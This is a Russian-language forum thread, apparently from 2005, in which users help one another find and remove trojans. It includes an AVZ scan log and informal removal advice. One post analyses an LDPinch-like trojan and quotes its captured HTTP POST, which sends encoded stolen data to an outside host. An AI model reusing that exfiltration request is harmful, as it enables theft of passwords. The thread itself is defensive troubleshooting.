скорее всего у тебя backdoor-вирус. попробуй поискать AVZ.

Тебе главное получить хотя бы название вируса. Там в окошке оно нигде не мелькает ? Если да, то ищи его описание например на www.kaspersky.ru и удаляй его руками. Или ставь Касперского чтобы название выяснить, заодно он может его и сам прихлопнет.

только что избавился от этой ерунды (перезагрузки е.е.в.р. )это back door!!!От этого дела хорошо избавляет Каспеский и переустановка Windows (на всякий пожаный)

кстате, если повезет, то его можно найти в прогах для удаления. зайди в панель управления, установка и удаление программ. и посмотри на самые подозрительные и сноси их!

а как его можно найти? как он выглядит? :rolleyes: я уже удалила все программы, которыми не пльзуюсь...

backdoor это не название конкретного вируса а всего класса известного под другим названием - трояны. Тебе нужно название конкретного вируса

Вчера нашел новую прогу, против вирусов и троянов. Прога небольшая, использует метод эвристики и вапще сделана русскими программерами. Несмотря на то, что база антивируса у меня стоит последняя, ad-aware тоже последняя прошивка. Вот что нашла прога (http://z-oleg.com/avz-betta2.zip).



Протокол антивирусной утилиты AVZ версии 3.10
Сканирование запущено в 16.03.2005 10:14:37
Загружена база: 10116 сигнатур, 1 нейропрофиль, 17 микропрограмм лечения
Загружены микропрограммы эвристики: 154
Загружены цифровые подписи системных файлов: 24033
Режим эвристического анализатора: Максимальный уровень эвристики
1. Поиск RootKit и программ, перехватывающих функции API
1.1 Поиск перехватчиков API, работающих в UserMode
Анализ kernel32.dll, таблица экспорта найдена в секции .text
Анализ ntdll.dll, таблица экспорта найдена в секции .text
Анализ user32.dll, таблица экспорта найдена в секции .text
Анализ advapi32.dll, таблица экспорта найдена в секции .text
Анализ ws2_32.dll, таблица экспорта найдена в секции .text
Анализ wininet.dll, таблица экспорта найдена в секции .text
Анализ rasapi32.dll, таблица экспорта найдена в секции .text
Анализ urlmon.dll, таблица экспорта найдена в секции .text
Анализ netapi32.dll, таблица экспорта найдена в секции .text
1.2 Поиск перехватчиков API, работающих в KernelMode
Эталонная KeServiceDescriplorTable найдена (FC=082B80, RVA=082B80)
2. Проверка памяти
Количество найденных процессов: 23
Процесс c:\program files\tgtsoft\stylexp\stylexpservice***** может работать с сетью (netapi32.dll)
Процесс c:\program files\common files\symantec shared\ccevtmgr***** может работать с сетью (netapi32.dll)
Процесс c:\program files\common files\symantec shared\ccapp***** может работать с сетью (netapi32.dll,ws2_32.dll,ws2help.dll,wininet.dll)
Процесс c:\program files\cisco systems\aironet client monitor\acumon***** может работать с сетью (ws2_32.dll,ws2help.dll)
Процесс c:\windows\system\mra***** может работать с сетью (wininet.dll,ws2_32.dll,ws2help.dll,netapi32.dll)
Процесс c:\program files\download master\dmaster***** может работать с сетью (wininet.dll,ws2_32.dll,ws2help.dll,urlmon.dll,rasapi32.dll,netapi32.dll,tapi32. dll)
Процесс c:\program files\tgtsoft\stylexp\stylexp***** может работать с сетью (netapi32.dll,urlmon.dll,wininet.dll)
Процесс c:\program files\common files\symantec shared\security center\symwsc***** может работать с сетью (wininet.dll,ws2_32.dll,ws2help.dll,netapi32.dll)
Процесс d:\downloads\Архивы\avz-betta2\avz-betta2\avz***** может работать с сетью (ws2_32.dll,ws2help.dll,rasapi32.dll,netapi32.dll,tapi32.dll)
Количество загруженных модулей: 319
Проверка памяти завершена
3. Сканирование дисков
C:\Documents and Settings\eldar\Local Settings\Temporary Internet Files\Content.IE5\WHYJGDEB\bunSetup[1].cab>>>>> Вирус !! Spy.SAHAgent успешно удален
C:\Program Files\Common Files\updater\delupdat*****>>>>> Вирус !! TrojanDownloader.Win32.Keenval успешно удален
C:\Program Files\filesubmit\yinyangdragon.zip\NNEZTA388*****>>> подозрение на Spy.NewDotNet ( 004A1093 08CD5FC5 001FAE87 0024837E 196608)
C:\Program Files\QuickSearch\quicksearchbar1_27.bak>>>>> Вирус !! AdvWare.ToolBar.Quick.a успешно удален
C:\WINDOWS\Downloaded Program Files\lsp_.dll>>>>> Вирус !! Spy.SAHAgent успешно удален
C:\WINDOWS\Downloaded Program Files\SAHAgent_*****>>>>> Вирус !! Spy.SAHAgent успешно удален
C:\WINDOWS\Downloaded Program Files\SahHtml_*****>>>>> Вирус !! Spy.SAHAgent успешно удален
C:\WINDOWS\Downloaded Program Files\SAHUninstall_*****>>>>> Вирус !! Spy.SAHAgent успешно удален
4. Проверка Winsock Layered Service Provider (SPI/LSP)
Настройки LSP проверены. Ошибок не обнаружено
5. Поиск клавиатурных шпионов (Keylogger)
C:\WINDOWS\system32\hplun.dll --> Подозрение на Keylogger или троянскую DLL
Результат оценки нейросетью - файл является кейлоггером с вероятностью 1.39%
6. Поиск открытых портов TCP/UDP, используемых вредоносными программами
В базе 320 описаний портов
На данном ПК открыто 7 TCP портов и 11 UDP портов
Проверка завершена, подозрительные порты не обнаружены
7. Эвристичеcкая проверка системы
Проверка завершена
Просканировано файлов: 17147, найдено вирусов 7
Сканирование завершено в 16.03.2005 10:24:17
Внимание !!! Для завершения процесса лечения необходима перезагрузка
Сканирование длилось 00:09:40

тиэ посмари слудещее у мя такая штука была - достала ужо
вот сначала вопрос- у тя эксплорер сам запускаетси? или закрываетси и иногда эта фихня вылазит?
1 поставь ad-ware
пройдись им
2 посмотри какие процессы запущены нет ли там webrebates0 или 1
убей их
далее снеси все надстройки на експлорер через удаление програм
3 - если есть такие процессы найди соответствующюю папку в программ филес у грохни яе

а это как :rolleyes:

береш загрузочный диск, грузишся, заходиш в директорию где у тебя AVZ, помоему он пот ДОСом тоже идет..
второй вариант - береш жесткий диск, идешь к подруге ставишь, проверяешь..

ну я же пока жаренный петух не клюнет(((

у меня сидит какой-то конкретный троянчик, каждые три минуты пингует какой-то хост www.spymoon.com из-за этого я из андеграунд 2 каждые 3 минуты вылетаю, она игрушка свертывается и все((

короче. вот такая канитель.

1. Копирайты setup поддельные
2. UPX модифицирован - штатный распаковщик не может его разжать
3. Winhost - это троян. Похож на LdPinch. При старте связывается с хостом http://spymoon.com по протоколу HTTP, при этом корректно воспринимает настройки прокси в IE.
Вот фрагмент обмена:
POST http://spymoon.com/images/mail.php HTTP/1.0
Accept: */ *
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: spymoon.com
Content-Length: 1119
Proxy-Connection: Keep-Alive
Pragma: no-cache
a=pinchreports@gmail.com
&b=252(TESTER)&c=<блок данных>

Блок данных кодирован по Base64 и упакован.
TESTER - имя компьютера, на котором запущен троян

Пришел ответ от ДрВеб
sysw.dll
Trojan.PWS.LDPinch.341
Trojan.MulDrop.1659
виримо он его скидывает, потому и удаление не помогает.
Олег, как обычно, был прав. Пароли менять теперь на мыло и аську, т.к. LDPinch их крадёт.
Лечение такое.
Перегрузиться в защищённый режим (safe mode, F8 при старте Винды)
Скачать утилитку Regsearch http://virusinfo.info/index.php?boar...y;threadid=536
поискать и удалить ссылки на sysw.dll, удалить сам файл а так же файлы setup***** и winhost*****. Можно поискать ссылки на них в реестре и тоже удалить.

.....................................................

закачал эту утилитку, а как ссылки искать эти и откуда убивать
файлы?

в том то и самалет - седня ты почистил реестр - завтра он восстанет из зада :D Надо тереть дллшный файл - этот гребаный бакдоор.. если не получается - грузись с диска или дискеты - или бери жесткий - на другой компа - и чисти, чисти..

кстате Меломанке - кейлоггер - он же типичный клавиатурный переключатель - не помню как называется - но там тоже есть функция - запись фсех нажатий клавиш в логи... видимо тоже определяет его как вирусняк

у меня стоит переключатель punto switcher.. точнее стоял, его удалили... может от него осталось?

видимо.. а в общем проблема решена?

нет.. не решали... если это от переключателя, то его можно и не удалять? мне так кажется

так грузи AVZ! если нет, то попробуй hijackthis - только это в зараженом компьютере надо запускать - выдает список процессоф..

вот что у меня показывает диспетчер задач

avz-ом проверила, вирусов не нашел, сказал, что какой то порт опасный... и еще однa dll-ka подозрение на вирус back door чего то там, зашла в безопасном режиме, первую удалила, а вторую нет
второй назывался svchost*****, он у меня как раз среди запущенных процессов присутствует
как с ним бороться?

чего эт он закомментировал :( svchost . exe

панель задач показывает не все процессы.. рекомендую программку hijackthis.. показывает все запущенные процессы, делает анализ, сохраняет в лог..

:rolleyes:

Это не вирус, а файлы для работы планшета Wacom! :)

Своевременный ответ

Так он же платный

а после всех этих извратов с компом ставь firefox или оперу, the bat или thunderbird, то есть как можно меньше микрософта в винде используй %)
есть бесплатный антивирь на freeav.com, нормальный монитор, нормальный сканер

сенкс
у меня firefox стоит - им пользуюсь регулярно, но иногда IE бывает удобнее. Например Download Master плохо интегрируется в firefox, или зависает часто при открытии pdf файла

Насчет интеграции - есть популярный плагин (навскидку не помню), который как-раз отвечает за интеграцию с Download утилитами.

Насчет IE. Есть плагин IE Tab (an extension from Taiwan, embeds Internet Explorer in a Mozilla/Firefox tab). Тут http://ietab.mozdev.org/

обновлять надо своевременно и файрфокс, и мастер, и все будет путем. обе проги использую постоянно. отличная интеграция. в чем у тебя проблема конкретно выражается?

Ну знаешь ли, это он в UK платный :D